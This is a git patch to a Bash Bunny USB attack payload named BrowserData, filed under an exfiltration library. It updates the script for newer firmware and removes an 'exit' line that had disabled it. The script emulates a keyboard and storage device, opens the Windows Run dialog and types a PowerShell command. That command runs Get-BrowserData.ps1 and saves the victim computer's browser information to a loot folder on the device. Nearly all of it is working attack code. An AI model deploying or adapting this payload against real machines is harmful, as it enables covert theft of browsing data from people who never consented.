From 4165a2dda9024f4eb5d1f6205d94b5d2c4dd2ce0 Mon Sep 17 00:00:00 2001 From: Bry-fi Date: Mon, 1 May 2017 12:26:32 -0400 Subject: [PATCH] Updated browserData payload for firmware v1.1+ (#185) * Fixed for 1.0 and 1.1 Fixed the payload for 1.0 but if you want it ported for 1.1, change line 38 to (LED M) * Made 1.1 compatible. Still need to examine Get-BrowserData.ps1 --- .../exfiltration/browserData/payload.txt | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/payloads/library/exfiltration/browserData/payload.txt b/payloads/library/exfiltration/browserData/payload.txt index 88bc9001..9f60c3ef 100755 --- a/payloads/library/exfiltration/browserData/payload.txt +++ b/payloads/library/exfiltration/browserData/payload.txt @@ -1,4 +1,3 @@ -exit #!/bin/bash # # Title: BrowserData @@ -14,24 +13,27 @@ exit # Blue...............Running Script # Purple.............Finished -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh +# Not sure if this is the right variable. Feel free to change it. -LED R 200 +ATTACKMODE HID STORAGE + +GET SWITCH_POSITION + +LED R SLOW LOOTDIR=/root/udisk/loot/BrowserData mkdir -p $LOOTDIR -ATTACKMODE HID STORAGE -LED B 200 + +LED B SLOW # wait 6 seconds for the storage to popup Q DELAY 6000 Q GUI r Q DELAY 100 -RUN WIN powershell \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Get-BrowserData.ps1'); $bunny =(gwmi win32_volume -f ’label=‘’BashBunny’’' | Select-Object -ExpandProperty DriveLetter); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt\" +Q STRING "powershell \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Get-BrowserData.ps1'); $bunny =(gwmi win32_volume -f ’label=‘’BashBunny’’' | Select-Object -ExpandProperty DriveLetter); Get-BrowserInformation | Out-File -Append $bunny\loot\BrowserData\$env:computername.txt\"" Q ENTER Q DELAY 2000 Q STRING exit Q ENTER sync -LED R B 200 \ No newline at end of file +LED M SLOW